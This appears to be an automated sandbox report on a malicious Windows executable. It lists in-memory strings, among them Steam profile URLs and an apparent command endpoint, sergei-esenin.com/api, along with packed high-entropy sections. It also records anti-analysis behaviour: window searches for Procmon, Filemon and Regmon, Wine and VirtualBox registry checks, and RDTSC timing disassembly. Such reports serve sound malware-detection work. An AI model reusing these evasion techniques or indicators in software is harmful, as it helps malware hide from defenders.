    Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
    Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
    Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
    Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
    Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
    Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
    Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
    Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
    Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
    Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
    Source: file.exe, 00000003.00000003.1344132717.0000000000AEF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1345433349.0000000000AF0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1345473697.0000000000B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/
    Source: file.exe, 00000003.00000003.1344132717.0000000000AEF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1345433349.0000000000AF0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/api
    Source: file.exe, 00000003.00000002.1345090990.0000000000A87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com:443/api
    Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
    Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
    Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
    Source: file.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1345473697.0000000000B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
    Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
    Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
    Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
    Source: file.exe, 00000003.00000002.1345090990.0000000000AB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
    Source: file.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
    Source: file.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
    Source: file.exe, 00000003.00000002.1345090990.0000000000AB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/765611997243319001
    Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
    Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
    Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
    Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
    Source: file.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1345473697.0000000000B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
    Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
    Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
    Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
    Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
    Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
    Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
    Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
    Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
    Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49702 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:49704 version: TLS 1.2

    System Summary

    barindex
    Source: file.exeStatic PE information: section name:
    Source: file.exeStatic PE information: section name: .rsrc
    Source: file.exeStatic PE information: section name: .idata
    Source: file.exeStatic PE information: section name:
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DB02283_2_00DB0228
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DEA0D03_2_00DEA0D0
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7E0843_2_00F7E084
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DE40403_2_00DE4040
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F3A06D3_2_00F3A06D
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DA10003_2_00DA1000
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DB20303_2_00DB2030
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DA71F03_2_00DA71F0
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F831B53_2_00F831B5
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DAE1A03_2_00DAE1A0
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00E8E1433_2_00E8E143
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DA51603_2_00DA5160
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DD82D03_2_00DD82D0
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DD12D03_2_00DD12D0
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DA12F73_2_00DA12F7
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DD23E03_2_00DD23E0
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F723813_2_00F72381
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DA13A33_2_00DA13A3
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DAB3A03_2_00DAB3A0
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DAA3003_2_00DAA300
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DD64F03_2_00DD64F0
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DB049B3_2_00DB049B
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DB44873_2_00DB4487
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DCC4703_2_00DCC470
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DBC5F03_2_00DBC5F0
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DA35B03_2_00DA35B0
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00E3052B3_2_00E3052B
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F775173_2_00F77517
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F745013_2_00F74501
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7C6FA3_2_00F7C6FA
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DE86F03_2_00DE86F0
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DE86523_2_00DE8652
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DA164F3_2_00DA164F
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DDF6203_2_00DDF620
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00E1071F3_2_00E1071F
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DDB8C03_2_00DDB8C0
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00E5B88A3_2_00E5B88A
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DDE8A03_2_00DDE8A0
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DAA8503_2_00DAA850
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DD18603_2_00DD1860
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F5F9CC3_2_00F5F9CC
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DC098B3_2_00DC098B
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00E7198A3_2_00E7198A
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DE89A03_2_00DE89A0
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DE8A803_2_00DE8A80
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DE7AB03_2_00DE7AB0
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DE4A403_2_00DE4A40
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7BA0D3_2_00F7BA0D
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DA7BF03_2_00DA7BF0
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DBDB6F3_2_00DBDB6F
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DCCCD03_2_00DCCCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00E28CCE3_2_00E28CCE
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DE6CBF3_2_00DE6CBF
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DE8C023_2_00DE8C02
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F05D6A3_2_00F05D6A
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DC8D623_2_00DC8D62
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DCFD103_2_00DCFD10
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0102CCD83_2_0102CCD8
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DCDD293_2_00DCDD29
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00E1AECA3_2_00E1AECA
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DB6EBF3_2_00DB6EBF
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DABEB03_2_00DABEB0
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DCAE573_2_00DCAE57
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DE8E703_2_00DE8E70
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DB4E2A3_2_00DB4E2A
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DA8FD03_2_00DA8FD0
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DE7FC03_2_00DE7FC0
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DAAF103_2_00DAAF10
    Source: C:\Users\user\Desktop\file.exeCode function: String function: 00DBD300 appears 152 times
    Source: C:\Users\user\Desktop\file.exeCode function: String function: 00DACAA0 appears 48 times
    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: file.exeStatic PE information: Section: ZLIB complexity 0.9996196885313532
    Source: file.exeStatic PE information: Section: uaabloyt ZLIB complexity 0.9942581415463297
    Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@10/2
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DD8220 CoCreateInstance,3_2_00DD8220
    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: file.exeReversingLabs: Detection: 42%
    Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
    Source: file.exeStatic file information: File size 1872384 > 1048576
    Source: file.exeStatic PE information: Raw size of uaabloyt is bigger than: 0x100000 < 0x19f800

    Data Obfuscation

    barindex
    Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 3.2.file.exe.da0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;uaabloyt:EW;wktppswf:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;uaabloyt:EW;wktppswf:EW;.taggant:EW;
    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
    Source: file.exeStatic PE information: real checksum: 0x1cf0c4 should be: 0x1d6ae3
    Source: file.exeStatic PE information: section name:
    Source: file.exeStatic PE information: section name: .rsrc
    Source: file.exeStatic PE information: section name: .idata
    Source: file.exeStatic PE information: section name:
    Source: file.exeStatic PE information: section name: uaabloyt
    Source: file.exeStatic PE information: section name: wktppswf
    Source: file.exeStatic PE information: section name: .taggant
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F8A0E9 push 38FEC2C1h; mov dword ptr [esp], ebx3_2_00F8A57F
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0101114A push 575D1682h; mov dword ptr [esp], eax3_2_01011175
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0101114A push 3D6561C5h; mov dword ptr [esp], ebp3_2_010111DA
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_01020154 push ecx; mov dword ptr [esp], esi3_2_01020173
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_01020154 push eax; mov dword ptr [esp], edx3_2_01020195
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0107115C push ebx; mov dword ptr [esp], edi3_2_01071407
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7E084 push 73A9AF60h; mov dword ptr [esp], edx3_2_00F7E0A3
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7E084 push 69538500h; mov dword ptr [esp], edi3_2_00F7E11E
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7E084 push 61C17300h; mov dword ptr [esp], esi3_2_00F7E207
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7E084 push ebp; mov dword ptr [esp], eax3_2_00F7E25E
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7E084 push 13F17889h; mov dword ptr [esp], ebx3_2_00F7E324
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7E084 push ecx; mov dword ptr [esp], eax3_2_00F7E39E
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7E084 push 06D4CDD1h; mov dword ptr [esp], ebx3_2_00F7E3FB
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7E084 push eax; mov dword ptr [esp], edi3_2_00F7E421
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7E084 push 04539FE3h; mov dword ptr [esp], eax3_2_00F7E43E
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7E084 push edi; mov dword ptr [esp], edx3_2_00F7E467
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7E084 push 2B00F400h; mov dword ptr [esp], ebp3_2_00F7E4BA
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7E084 push 3C7B5EF9h; mov dword ptr [esp], edi3_2_00F7E4FB
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7E084 push 69BAE500h; mov dword ptr [esp], ebx3_2_00F7E511
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7E084 push eax; mov dword ptr [esp], ebp3_2_00F7E5C4
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7E084 push eax; mov dword ptr [esp], 6F6B9896h3_2_00F7E63C
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7E084 push ebp; mov dword ptr [esp], ecx3_2_00F7E647
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7E084 push edx; mov dword ptr [esp], eax3_2_00F7E675
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7E084 push edx; mov dword ptr [esp], eax3_2_00F7E6D3
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7E084 push 503E30DDh; mov dword ptr [esp], eax3_2_00F7E7A4
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7E084 push eax; mov dword ptr [esp], ebx3_2_00F7E80D
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7E084 push esi; mov dword ptr [esp], edi3_2_00F7E867
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7E084 push eax; mov dword ptr [esp], edi3_2_00F7E8C8
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7E084 push edi; mov dword ptr [esp], esi3_2_00F7EA8A
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7E084 push ecx; mov dword ptr [esp], edi3_2_00F7EAA9
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7E084 push 3CD49614h; mov dword ptr [esp], ebp3_2_00F7EAC6
    Source: file.exeStatic PE information: section name: entropy: 7.984055290084938
    Source: file.exeStatic PE information: section name: uaabloyt entropy: 7.954325094548198

    Boot Survival

    barindex
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E042FE second address: E04302 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F86F93 second address: F86F99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F86F99 second address: F86F9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F86F9D second address: F86FBC instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD8346DB1F6h 0x00000008 jns 00007FD8346DB1F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 popad 0x00000013 pop eax 0x00000014 pop edx 0x00000015 pop eax 0x00000016 jns 00007FD8346DB210h 0x0000001c push ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F86FBC second address: F86FC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F86FC5 second address: F86FC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F86FC9 second address: F86FCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8722A second address: F87230 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F87230 second address: F87241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FD8346DCB26h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F87241 second address: F87245 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F87690 second address: F876A4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD8346DCB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007FD8346DCB26h 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8AB3B second address: F8AB4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD8346DB1FFh 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8AB4F second address: F8AB84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DCB38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD8346DCB36h 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8AB84 second address: F8ABC1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD8346DB1F8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007FD8346DB1FCh 0x00000015 mov eax, dword ptr [eax] 0x00000017 jmp 00007FD8346DB205h 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8ABC1 second address: F8ABC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8ABC5 second address: F8ABCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8ACAF second address: F8ACB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8ACB3 second address: F8ACFD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 add dword ptr [esp], 4E34810Dh 0x0000000e xor dl, 00000000h 0x00000011 lea ebx, dword ptr [ebp+1245AA54h] 0x00000017 or cx, 4A2Fh 0x0000001c xchg eax, ebx 0x0000001d jne 00007FD8346DB201h 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 jne 00007FD8346DB1F6h 0x0000002d jmp 00007FD8346DB201h 0x00000032 popad 0x00000033 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8AD84 second address: F8AD8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8AD8A second address: F8AD8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
